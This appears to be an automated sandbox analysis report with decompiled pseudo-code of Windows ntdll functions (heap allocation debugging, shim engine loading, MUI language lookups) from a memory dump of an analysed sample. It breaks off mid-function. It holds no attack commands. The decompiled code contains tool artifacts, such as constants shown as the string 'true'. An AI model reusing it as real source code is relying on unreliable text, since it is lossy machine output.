Opcode ID: 412d6b589b21cc860b4571747471e09fba7a8d2b770a3811a0fb93e44896192c
Instruction ID: 0e9b4240528b112de4631efe09c69ee566469fcf5d320642cb92108d1ac513ae
Opcode Fuzzy Hash: 412d6b589b21cc860b4571747471e09fba7a8d2b770a3811a0fb93e44896192c
Instruction Fuzzy Hash: 92900225242051529945B258560450B400657E1241791C817A5514911CC576985EE661

Uniqueness

Uniqueness Score: -1.00%

Function 328D2C30 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 328D2C3A

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2aba2366fdfefbf6fe593ccddc92b13001cb826a95af82cc6628faef53fa0b41
Instruction ID: 7033381034f9a9303a4b5b514d32bcdde061a9fbb4dbf77d8ffb0a0994c043ec
Opcode Fuzzy Hash: 2aba2366fdfefbf6fe593ccddc92b13001cb826a95af82cc6628faef53fa0b41
Instruction Fuzzy Hash: E390022D21301002D5807258660860E000547D2202F91DC1AA4115519CC965886D6361

Uniqueness

Uniqueness Score: -1.00%

Function 328D2C50 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 328D2C5A

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: aa5253552f06cdce89de6f3584eedbeb0153c8bafb0e2a122cf3128caea1bff4
Instruction ID: 34c2a1c533cc52bdc97f0967811d558b8aa8a1fc168be2a86b979b754cc3bf89
Opcode Fuzzy Hash: aa5253552f06cdce89de6f3584eedbeb0153c8bafb0e2a122cf3128caea1bff4
Instruction Fuzzy Hash: 1790022530101003D5407258661860A400597E2301F51D816E4514515CD965885E6262

Uniqueness

Uniqueness Score: -1.00%

Function 328D2DA0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 328D2DAA

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3e5cef719d268edf0c8fea00e0d14d36455aa81081c2084209e2cc76c4446c15
Instruction ID: d195799718eed99204fe1786806cd9495d12581e83b7dfb4113e188bd28300bb
Opcode Fuzzy Hash: 3e5cef719d268edf0c8fea00e0d14d36455aa81081c2084209e2cc76c4446c15
Instruction Fuzzy Hash: 9290022560101502D5017258560461A000A47D1241F91C827A5124516ECA75899AB171

Uniqueness

Uniqueness Score: -1.00%

Function 328D2DC0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 328D2DCA

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b8da1887150f7fb78805f8472bfd668e4aab7f0eef5f0257ace8511e2bf84ff5
Instruction ID: 41d6310b8eedced32c16e6f2804acb6f6ffedad24bd5092fd12865e3f08bc3f5
Opcode Fuzzy Hash: b8da1887150f7fb78805f8472bfd668e4aab7f0eef5f0257ace8511e2bf84ff5
Instruction Fuzzy Hash: F690027520101402D5407258560474A000547D1301F51C816A9164515EC6A98DDD76A5

Uniqueness

Uniqueness Score: -1.00%

Function 328D2D10 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 328D2D1A

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d489426499bd4fe27b056b4895e4d2b22ade0b88274a57490b1746ecfc62a997
Instruction ID: 53b6010915fc5030cc0f7bf54765c15fd8de3a8896dc9574853a50fd77df7119
Opcode Fuzzy Hash: d489426499bd4fe27b056b4895e4d2b22ade0b88274a57490b1746ecfc62a997
Instruction Fuzzy Hash: B590023520101413D5116258570470B000947D1241F91CC17A4524519DD6A6895AB161

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 3293F0A5 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231
timeCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E3293F0A5(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t87;
				signed int _t89;
				signed int _t92;
				intOrPtr _t93;
				intOrPtr _t94;
				signed char _t105;
				signed int _t106;
				intOrPtr _t108;
				signed int _t109;
				signed int _t110;
				intOrPtr _t112;
				intOrPtr _t116;
				short* _t134;
				short _t135;
				signed char _t153;
				signed int* _t158;
				short* _t169;
				signed int _t174;
				signed int _t184;
				signed int _t185;
				intOrPtr* _t190;
				void* _t191;

				_push("true");
				_push(0x3296d320);
				E328E7BE4(__ebx, __edi, __esi);
				_t188 = __ecx;
				 *((intOrPtr*)(_t191 - 0x3c)) = __ecx;
				 *((char*)(_t191 - 0x19)) = 0;
				 *(_t191 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *(_t191 - 4) = 0;
					 *(_t191 - 4) = 1;
					_t87 = E32887662("RtlAllocateHeap");
					__eflags = _t87;
					if(_t87 == 0) {
						L46:
						 *(_t191 - 0x24) = 0;
						L47:
						 *(_t191 - 4) = 0;
						 *(_t191 - 4) = 0xfffffffe;
						E3293F3F9();
						_t89 =  *(_t191 - 0x24);
						goto L48;
					}
					_t153 =  *(__ecx + 0x44) | __edx;
					 *(_t191 - 0x2c) = _t153;
					_t183 = _t153 | 0x10000100;
					 *(_t191 - 0x34) = _t153 | 0x10000100;
					_t174 =  *(_t191 + 8);
					__eflags = _t174;
					 *(_t191 - 0x20) = _t174;
					if(_t174 == 0) {
						 *(_t191 - 0x20) = 1;
					}
					_t92 =  *((intOrPtr*)(_t188 + 0x94)) +  *(_t191 - 0x20) &  *(_t188 + 0x98);
					__eflags = _t92 - 0x10;
					if(_t92 < 0x10) {
						_push("true");
						_pop(_t92);
					}
					_t93 = _t92 + 8;
					 *((intOrPtr*)(_t191 - 0x40)) = _t93;
					__eflags = _t93 - _t174;
					if(_t93 < _t174) {
						L42:
						_t94 =  *[fs:0x30];
						__eflags =  *(_t94 + 0xc);
						if( *(_t94 + 0xc) == 0) {
							_push("HEAP: ");
							E3288B910();
						} else {
							E3288B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t188 + 0x78)));
						E3288B910("Invalid allocation size - %Ix (exceeded %Ix)\n",  *(_t191 + 8));
						goto L46;
					} else {
						__eflags = _t93 -  *((intOrPtr*)(_t188 + 0x78));
						if(_t93 >  *((intOrPtr*)(_t188 + 0x78))) {
							goto L42;
						}
						__eflags = _t153 & 0x00000001;
						if((_t153 & 0x00000001) == 0) {
							E3289FED0( *((intOrPtr*)(_t188 + 0xc8)));
							 *((char*)(_t191 - 0x19)) = 1;
							_t183 =  *(_t191 - 0x2c) | 0x10000101;
							__eflags = _t183;
							 *(_t191 - 0x34) = _t183;
						}
						E32940835(_t188, 0);
						_t184 = L328A5D90(_t188, _t188, _t183,  *(_t191 + 8));
						 *(_t191 - 0x24) = _t184;
						_t176 = 1;
						L32940D24(_t188);
						__eflags = _t184;
						if(_t184 == 0) {
							goto L47;
						} else {
							_t185 = _t184 + 0xfffffff8;
							__eflags =  *((char*)(_t185 + 7)) - 5;
							if( *((char*)(_t185 + 7)) == 5) {
								_t185 = _t185 - (( *(_t185 + 6) & 0x000000ff) << 3);
								__eflags = _t185;
							}
							_t158 = _t185;
							 *(_t191 - 0x38) = _t185;
							__eflags =  *(_t188 + 0x4c);
							if( *(_t188 + 0x4c) != 0) {
								 *_t185 =  *_t185 ^  *(_t188 + 0x50);
								__eflags =  *(_t185 + 3) - (_t158[0] ^ _t158[0] ^  *_t158);
								if(__eflags != 0) {
									_push(_t158);
									_t176 = _t185;
									E3294D646(0, _t188, _t185, _t185, _t188, __eflags);
								}
							}
							__eflags =  *(_t185 + 2) & 0x00000002;
							if(( *(_t185 + 2) & 0x00000002) == 0) {
								_t105 =  *(_t185 + 3);
								 *(_t191 - 0x1a) = _t105;
								_t106 = _t105 & 0x000000ff;
							} else {
								_t134 = E328C3AE9(_t185);
								 *((intOrPtr*)(_t191 - 0x28)) = _t134;
								__eflags =  *(_t188 + 0x40) & 0x08000000;
								if(( *(_t188 + 0x40) & 0x08000000) == 0) {
									 *_t134 = 0;
								} else {
									_t135 = L328BFDB9(1, _t176);
									_t169 =  *((intOrPtr*)(_t191 - 0x28));
									 *_t169 = _t135;
									_t134 = _t169;
								}
								_t45 = _t134 + 2; // 0xffff
								_t106 =  *_t45 & 0x0000ffff;
							}
							 *(_t191 - 0x2c) = _t106;
							 *(_t191 - 0x20) = _t106;
							__eflags =  *(_t188 + 0x4c);
							if( *(_t188 + 0x4c) != 0) {
								 *(_t185 + 3) =  *(_t185 + 2) ^  *(_t185 + 1) ^  *_t185;
								 *_t185 =  *_t185 ^  *(_t188 + 0x50);
								__eflags =  *_t185;
							}
							__eflags =  *(_t188 + 0x40) & 0x20000000;
							if(( *(_t188 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								E32940835(_t188, 0);
							}
							__eflags =  *(_t191 - 0x24) -  *0x329847c0; // 0x0
							_t108 =  *[fs:0x30];
							if(__eflags != 0) {
								_t109 =  *(_t108 + 0x68);
								 *(_t191 - 0x44) = _t109;
								__eflags = _t109 & 0x00000800;
								if((_t109 & 0x00000800) == 0) {
									goto L47;
								}
								_t110 =  *(_t191 - 0x2c);
								__eflags = _t110;
								if(_t110 == 0) {
									goto L47;
								}
								__eflags = _t110 -  *0x329847c4; // 0x0
								if(__eflags != 0) {
									goto L47;
								}
								__eflags =  *((intOrPtr*)(_t188 + 0x7c)) -  *0x329847c6; // 0x0
								if(__eflags != 0) {
									goto L47;
								}
								_t112 =  *[fs:0x30];
								__eflags =  *(_t112 + 0xc);
								if( *(_t112 + 0xc) == 0) {
									_push("HEAP: ");
									E3288B910();
								} else {
									E3288B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E3293823A(_t188,  *(_t191 - 0x20)));
								_push( *(_t191 + 8));
								E3288B910("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t191 - 0x24));
								goto L32;
							} else {
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									E3288B910();
								} else {
									E3288B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t191 + 8));
								E3288B910("Just allocated block at %p for %Ix bytes\n",  *0x329847c0);
								L32:
								_t116 =  *[fs:0x30];
								__eflags =  *((char*)(_t116 + 2));
								if( *((char*)(_t116 + 2)) != 0) {
									 *0x329847a1 = 1;
									 *0x32984100 = 0;
									asm("int3");
									 *0x329847a1 = 0;
								}
								goto L47;
							}
						}
					}
				} else {
					_t190 =  *0x32983748; // 0x0
					 *0x329891e0(__ecx, __edx,  *(_t191 + 8));
					_t89 =  *_t190();
					L48:
					 *[fs:0x0] =  *((intOrPtr*)(_t191 - 0x10));
					return _t89;
				}
			}

0x3293f0a5
0x3293f0a7
0x3293f0ac
0x3293f0b3
0x3293f0b5
0x3293f0ba
0x3293f0bd
0x3293f0c7
0x3293f0e3
0x3293f0e6
0x3293f0f4
0x3293f0f9
0x3293f0fb
0x3293f3d2
0x3293f3d2
0x3293f3d5
0x3293f3d5
0x3293f3d8
0x3293f3df
0x3293f3e4
0x00000000
0x3293f3e4
0x3293f104
0x3293f106
0x3293f10b
0x3293f111
0x3293f114
0x3293f117
0x3293f119
0x3293f11c
0x3293f11e
0x3293f11e
0x3293f12e
0x3293f134
0x3293f137
0x3293f139
0x3293f13b
0x3293f13b
0x3293f13c
0x3293f13f
0x3293f142
0x3293f144
0x3293f350
0x3293f350
0x3293f356
0x3293f359
0x3293f378
0x3293f37d
0x3293f35b
0x3293f370
0x3293f375
0x3293f383
0x3293f38e
0x00000000
0x3293f14a
0x3293f14a
0x3293f14d
0x00000000
0x00000000
0x3293f153
0x3293f156
0x3293f15e
0x3293f163
0x3293f16a
0x3293f16a
0x3293f170
0x3293f170
0x3293f177
0x3293f186
0x3293f188
0x3293f18b
0x3293f18f
0x3293f194
0x3293f196
0x00000000
0x3293f19c
0x3293f19c
0x3293f19f
0x3293f1a3
0x3293f1ac
0x3293f1ac
0x3293f1ac
0x3293f1ae
0x3293f1b0
0x3293f1b3
0x3293f1b6
0x3293f1bb
0x3293f1c5
0x3293f1c8
0x3293f1ca
0x3293f1cb
0x3293f1cf
0x3293f1cf
0x3293f1c8
0x3293f1d4
0x3293f1d8
0x3293f208
0x3293f20b
0x3293f20e
0x3293f1da
0x3293f1dc
0x3293f1e1
0x3293f1e6
0x3293f1ed
0x3293f1ff
0x3293f1ef
0x3293f1f0
0x3293f1f5
0x3293f1f8
0x3293f1fb
0x3293f1fb
0x3293f202
0x3293f202
0x3293f202
0x3293f211
0x3293f214
0x3293f218
0x3293f21b
0x3293f227
0x3293f22d
0x3293f22d
0x3293f22d
0x3293f22f
0x3293f236
0x3293f238
0x3293f23c
0x3293f23c
0x3293f244
0x3293f24a
0x3293f250
0x3293f2be
0x3293f2c1
0x3293f2c4
0x3293f2c9
0x00000000
0x00000000
0x3293f2cf
0x3293f2d2
0x3293f2d5
0x00000000
0x00000000
0x3293f2db
0x3293f2e2
0x00000000
0x00000000
0x3293f2ec
0x3293f2f3
0x00000000
0x00000000
0x3293f2f9
0x3293f2ff
0x3293f302
0x3293f321
0x3293f326
0x3293f304
0x3293f319
0x3293f31e
0x3293f337
0x3293f338
0x3293f343
0x00000000
0x3293f252
0x3293f252
0x3293f255
0x3293f274
0x3293f279
0x3293f257
0x3293f26c
0x3293f271
0x3293f27f
0x3293f28d
0x3293f295
0x3293f295
0x3293f29b
0x3293f29f
0x3293f2a5
0x3293f2ac
0x3293f2b2
0x3293f2b3
0x3293f2b3
0x00000000
0x3293f29f
0x3293f250
0x3293f196
0x3293f0c9
0x3293f0ce
0x3293f0d6
0x3293f0dc
0x3293f3e7
0x3293f3ea
0x3293f3f6
0x3293f3f6

APIs

RtlDebugPrintTimes.NTDLL ref: 3293F0D6

Strings

Just allocated block at %p for %Ix bytes, xrefs: 3293F288
HEAP[%wZ]: , xrefs: 3293F267, 3293F314, 3293F36B
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 3293F389
RtlAllocateHeap, xrefs: 3293F0ED
Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 3293F33E
HEAP: , xrefs: 3293F274, 3293F321, 3293F378

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: DebugPrintTimes
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 3446177414-1745908468
Opcode ID: 86cef7ee5bd6eaf53f5cae4016c7de5c78690325adc4f38ee00e85c9e9892881
Instruction ID: ec63be2a4e3cb319af90bc6a0a18d66fe99f9a82529105ed347f1954f14d5a23
Opcode Fuzzy Hash: 86cef7ee5bd6eaf53f5cae4016c7de5c78690325adc4f38ee00e85c9e9892881
Instruction Fuzzy Hash: 1F914539906744DFEB06CFA8C840BADBBF2FF49354F048499E554AB752CB7A9941CB10

Uniqueness

Uniqueness Score: -1.00%

Function 3288640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150
timeCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E3288640D(void* __ecx) {
				signed int _v8;
				void* _v12;
				void* _v536;
				void* _v548;
				char _v780;
				char* _v784;
				char _v788;
				char _v792;
				intOrPtr _v804;
				char _v868;
				char* _v872;
				short _v874;
				char _v876;
				void* _v880;
				char _v892;
				void* _v896;
				void* _v900;
				void* _v904;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t48;
				short _t49;
				void* _t52;
				signed char _t61;
				void* _t67;
				intOrPtr _t71;
				void* _t81;
				signed char _t85;
				void* _t99;
				void* _t100;
				void* _t102;
				void* _t103;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				void* _t109;

				_t108 = (_t106 & 0xfffffff8) - 0x374;
				_v8 =  *0x3298b370 ^ _t108;
				_t48 = 0x16;
				_v876 = _t48;
				_t96 =  &_v876;
				_push("true");
				_pop(_t49);
				_v874 = _t49;
				_t99 = __ecx;
				_v872 = L"apphelp.dll";
				_v784 =  &_v780;
				_v788 = 0x1000000;
				_v780 = 0;
				_t52 = L32886C11( &_v788,  &_v876, _t109);
				if(_t52 < 0) {
					_t85 =  *0x329837c0; // 0x0
					__eflags = _t85 & 0x00000003;
					if((_t85 & 0x00000003) == 0) {
						L12:
						__eflags = _t85 & 0x00000010;
						L15:
						if(__eflags != 0) {
							asm("int3");
						}
						L6:
						_t53 =  &_v780;
						if( &_v780 != _v784) {
							_t53 = E3288BA80(_v784);
						}
						_pop(_t100);
						_pop(_t102);
						_pop(_t81);
						return E328D4B50(_t53, _t81, _v8 ^ _t108, _t96, _t100, _t102);
					}
					_push(_t52);
					_push("Building shim engine DLL system32 filename failed with status 0x%08lx\n");
					_push(0);
					_push("LdrpInitShimEngine");
					_push(0xa35);
					L11:
					_push("minkernel\\ntdll\\ldrinit.c");
					E3290E692();
					_t85 =  *0x329837c0; // 0x0
					_t108 = _t108 + 0x18;
					goto L12;
				}
				E328AE8A6(0, 0x4001,  &_v868);
				_t96 =  &_v872;
				_t103 = E32886B45( &_v792,  &_v872, 0,  &_v892);
				if(_v804 != 0) {
					E328BE7E0( &_v792, _v868);
				}
				_t112 = _t103;
				if(_t103 < 0) {
					_t61 =  *0x329837c0; // 0x0
					__eflags = _t61 & 0x00000003;
					if((_t61 & 0x00000003) != 0) {
						E3290E692("minkernel\\ntdll\\ldrinit.c", 0xa48, "LdrpInitShimEngine", 0, "Loading the shim engine DLL failed with status 0x%08lx\n", _t103);
						_t61 =  *0x329837c0; // 0x0
						_t108 = _t108 + 0x18;
					}
					__eflags = _t61 & 0x00000010;
					goto L15;
				} else {
					 *( *((intOrPtr*)(_t108 + 0xc)) + 0x34) =  *( *((intOrPtr*)(_t108 + 0xc)) + 0x34) | 0x00000100;
					 *0x32985d64 =  *((intOrPtr*)( *((intOrPtr*)(_t108 + 0xc)) + 0x18));
					L328C7DF6( *((intOrPtr*)(_t108 + 0xc)));
					E328AD3E1(0,  *((intOrPtr*)(_t108 + 0xc)), _t103);
					_t67 = E32886868( *((intOrPtr*)(_t108 + 0xc)), _t96, _t112);
					if(_t67 < 0) {
						_t85 =  *0x329837c0; // 0x0
						__eflags = _t85 & 0x00000003;
						if((_t85 & 0x00000003) == 0) {
							goto L12;
						}
						_push(_t67);
						_push("Getting the shim engine exports failed with status 0x%08lx\n");
						_push(0);
						_push("LdrpInitShimEngine");
						_push(0xa56);
						goto L11;
					}
					_t104 =  *0x32989208; // 0x0
					_v872 = _t108 + 0x178;
					_v876 = 0x2000000;
					_t96 =  *0x7ffe0330;
					_t71 =  *0x32985b24; // 0x2552ce0
					asm("ror esi, cl");
					 *0x329891e0( &_v876, _t71 + 0x24, _t99, "true");
					if( *(_t104 ^  *0x7ffe0330)() >= 0) {
						E32886565( *((intOrPtr*)(_t108 + 0x14)));
						if( *((intOrPtr*)(_t108 + 0x14)) != _t108 + 0x178) {
							E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t108 + 0x14)));
						}
					}
					goto L6;
				}
			}

0x32886415
0x32886422
0x3288642e
0x3288642f
0x32886434
0x32886438
0x3288643a
0x3288643b
0x32886440
0x32886446
0x3288644e
0x32886458
0x32886460
0x32886465
0x3288646c
0x328e9770
0x328e9776
0x328e9779
0x328e97b3
0x328e97b3
0x328e97dd
0x328e97dd
0x328e97e3
0x328e97e3
0x32886542
0x32886542
0x3288654a
0x328e982b
0x328e982b
0x32886557
0x32886558
0x32886559
0x32886564
0x32886564
0x328e977b
0x328e977c
0x328e9781
0x328e9783
0x328e9788
0x328e97a0
0x328e97a0
0x328e97a5
0x328e97aa
0x328e97b0
0x00000000
0x328e97b0
0x3288647e
0x3288648b
0x32886498
0x3288649e
0x328e97ed
0x328e97ed
0x328864a4
0x328864a6
0x328e97f7
0x328e97fc
0x328e97fe
0x328e97ce
0x328e97d3
0x328e97d8
0x328e97d8
0x328e97db
0x00000000
0x328864ac
0x328864b0
0x328864be
0x328864c3
0x328864cc
0x328864d1
0x328864d8
0x328e9802
0x328e9808
0x328e980b
0x00000000
0x00000000
0x328e978f
0x328e9790
0x328e9795
0x328e9796
0x328e979b
0x00000000
0x328e979b
0x328864de
0x328864eb
0x328864f1
0x328864f9
0x32886507
0x32886510
0x3288651c
0x32886526
0x3288652c
0x3288653c
0x328e981d
0x328e981d
0x3288653c
0x00000000
0x32886526

APIs

RtlDebugPrintTimes.NTDLL ref: 3288651C

Part of subcall function 32886565: RtlDebugPrintTimes.NTDLL ref: 32886614
Part of subcall function 32886565: RtlDebugPrintTimes.NTDLL ref: 3288665F

Strings

Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 328E977C
apphelp.dll, xrefs: 32886446
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 328E97B9
LdrpInitShimEngine, xrefs: 328E9783, 328E9796, 328E97BF
minkernel\ntdll\ldrinit.c, xrefs: 328E97A0, 328E97C9
Getting the shim engine exports failed with status 0x%08lx, xrefs: 328E9790

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-204845295
Opcode ID: 913345cad55d7bec55f5e3db1eb3799dc120cdf75850317e2eccf477f0e6189a
Instruction ID: 42e3bfc48356e0a4d4831830c99a51cd43b9fd90715e616499f48065c9b26685
Opcode Fuzzy Hash: 913345cad55d7bec55f5e3db1eb3799dc120cdf75850317e2eccf477f0e6189a
Instruction Fuzzy Hash: E651B2792493089FF314CF28CC91AAB77E8EF85744F44091DFA9997260EA70D949CB92

Uniqueness

Uniqueness Score: -1.00%

Function 3288D2EC Relevance: 11.6, Strings: 9, Instructions: 312
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E3288D2EC(unsigned int __ecx, signed int _a4, intOrPtr _a8, char* _a12, intOrPtr* _a16) {
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				unsigned int _v100;
				signed int _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v117;
				char _v120;
				char _v124;
				intOrPtr _v128;
				void* _v132;
				void* _v136;
				void* _v140;
				void* _v144;
				void* _v148;
				void* _v164;
				void* _t116;
				void* _t124;
				char* _t134;
				void* _t155;
				char* _t170;
				char _t171;
				void* _t176;
				signed int _t181;
				void* _t184;
				void* _t190;
				signed int _t192;
				void* _t194;
				signed int _t196;
				signed int _t198;
				void* _t200;

				_t200 = (_t198 & 0xfffffff8) - 0x74;
				_t170 = _a12;
				_v100 = __ecx;
				_v108 = 0;
				_v112 = 0;
				_v104 = 0;
				_v96 = 7;
				_v92 = 0;
				_v88 = 0;
				_v117 = 0;
				_t190 = 0;
				_v116 = 0;
				if(__ecx == 0 || _t170 == 0 || _a16 == 0) {
					_t194 = 0xc000000d;
					goto L23;
				} else {
					_t196 = _a4;
					 *_t170 = 0;
					if(_t196 == 1 || _t196 == 0) {
						E328D5050(0,  &_v84, L"\\Registry\\Machine\\Software\\Policies\\Microsoft\\MUI\\Settings");
						_v84 = 0x18;
						_v76 =  &_v92;
						_v80 = 0;
						_push( &_v84);
						_push(0x20019);
						_v72 = 0x40;
						_push( &_v112);
						_v68 = 0;
						_v64 = 0;
						if(E328D2AB0() >= 0) {
							_t124 = E32887220(_v104, _v100,  &_v116);
							_t190 = _v128;
							_t194 = _t124;
							if(_t194 != 0 || _t190 == 0) {
								_t181 = _v104;
								_t196 = _a4;
								goto L7;
							} else {
								goto L24;
							}
						} else {
							_t181 = 0;
							_v104 = 0;
							L7:
							if(_t196 == 1 && _t181 != 0) {
								_t187 =  &_v117;
								if(L3294AD61(_t181,  &_v117) >= 0) {
									asm("sbb eax, eax");
									_a4 = _t196 &  ~(_v117 - 0x00000001 & 0x000000ff);
								}
							}
							_t194 = E3288D736(0x2000000,  &_v108);
							if(_t194 < 0) {
								L51:
								 *_t170 = 1;
								goto L23;
							} else {
								if(_a4 != 1) {
									E328D5050(0x2000000,  &_v84, L"Control Panel\\Desktop\\MuiCached");
									_t194 = 0;
									_v32 = _v116;
									_v28 =  &_v92;
									_push( &_v36);
									_push(0x20019);
									_v36 = 0x18;
									_push( &_v120);
									_v24 = 0x40;
									_v20 = 0;
									 *((intOrPtr*)(_t200 + 0x88)) = 0;
									if(E328D2AB0() < 0) {
										 *_t170 = 1;
										L24:
										_t176 = 0;
										L25:
										_t112 = _a4;
										if(_a4 != 0 || _t190 != 0 &&  *((intOrPtr*)(_t190 + 4)) != _t176) {
											_t173 = _v100;
											L29:
											if(_t190 == 0) {
												_t190 = E328B3262(1, _t187 & 0xffffff00 | _t112 != 0x00000001, _t173);
												if(_t190 == 0) {
													_t194 = 0xc0000017;
												}
											}
											goto L31;
										} else {
											_t173 = _v100;
											_t116 = L3294BD08(_v100, _t187, _t170,  &_v116);
											_t190 = _v124;
											_t194 = _t116;
											if(_t194 != 0) {
												L31:
												 *_a16 = _t190;
												L32:
												_t105 = _v88;
												if(_v88 == 0) {
													L43:
													_t171 = 0;
													goto L34;
												} else {
													_t171 = 0;
													E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t105);
													L34:
													if(_v112 != 0) {
														_push(_v112);
														E328D2A80();
														_v116 = _t171;
													}
													if(_v108 != 0) {
														_push(_v108);
														E328D2A80();
														_v112 = _t171;
													}
													if(_v104 != 0) {
														_push(_v104);
														E328D2A80();
													}
													goto L39;
												}
											}
											_t112 = _a4;
											goto L29;
										}
									}
									_t134 = L"MachinePreferredUILanguages";
									L15:
